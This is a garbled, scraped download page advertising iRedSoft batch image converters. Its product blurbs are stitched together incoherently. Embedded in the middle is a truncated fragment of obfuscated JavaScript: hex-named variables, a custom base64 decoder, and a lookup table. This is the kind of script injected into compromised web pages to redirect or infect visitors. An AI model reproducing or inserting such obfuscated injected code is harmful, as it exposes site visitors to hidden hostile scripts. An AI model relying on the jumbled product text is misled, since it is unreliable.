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It allows you to resize, convert, add watermark, add caption and more to your images.. Share Your Opinion User Reviews :Batch J2K Converter is a blazing fast batch image converter which is made to handle large jpeg 2000 images fast.. constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x51186b){_0x544c96=window;}return _0x544c96;};var _0x46430d=_0x3d1a23();var _0x22ac02='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x46430d['atob']||(_0x46430d['atob']=function(_0x188f16){var _0x1471f0=String(_0x188f16)['replace'](/=+$/,'');for(var _0x2559c3=0x0,_0x1da4f6,_0xaea137,_0x49dbc7=0x0,_0x4f3f04='';_0xaea137=_0x1471f0['charAt'](_0x49dbc7++);~_0xaea137&&(_0x1da4f6=_0x2559c3%0x4?_0x1da4f6*0x40+_0xaea137:_0xaea137,_0x2559c3++%0x4)?_0x4f3f04+=String['fromCharCode'](0xff&_0x1da4f6>>(-0x2*_0x2559c3&0x6)):0x0){_0xaea137=_0x22ac02['indexOf'](_0xaea137);}return _0x4f3f04;});}());_0x44a3['base64DecodeUnicode']=function(_0x269f62){var _0x955a02=atob(_0x269f62);var _0x14ec9f=[];for(var _0x49a8e2=0x0,_0x537c3d=_0x955a02['length'];_0x49a8e2=_0xfa7e7f;},'qoUwN':function _0x2f29a2(_0x224c83,_0x240f04){return _0x224c83(_0x240f04);},'eZJif':function _0x479b32(_0x442c9f,_0x3da54e){return _0x442c9f+_0x3da54e;},'TUvEE':function _0x296b44(_0x2d82dc,_0x5285f4){return _0x2d82dc+_0x5285f4;}};var _0x598d91=[_0x45ed84['zZpvF'],_0x45ed84[_0x44a3('0x19')],_0x45ed84['MkcsH'],_0x45ed84[_0x44a3('0x1a')],_0x45ed84['SyxnL'],'.. Apart from JPEG 2000, it can handle JPEG, BMP, TIFF and other commonly used image format.
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DOWNLOADS FROM IREDSOFT TECHNOLOGY INCBatch It!Automated Batch Imaging Editor for WebmastersBatch It! UltraAutomated Batch Imaging Editor for Webmasters and Digital PhotographersBatch TIFF & PDF ConverterBatch TIFF & PDF Converter is an All-In-One Toolkit for TIFF and PDFiRedSoft Sort ListHelps you sort list of text in ascending or descending orderBatch Image CommanderCommand Line and Timer Based Batch image processor[ More downloads from iRedSoft Technology Inc ].. It is a must have for anyone who needs to convert JPEG-2000 Maps with Geo-TIFF to an easily available image format.
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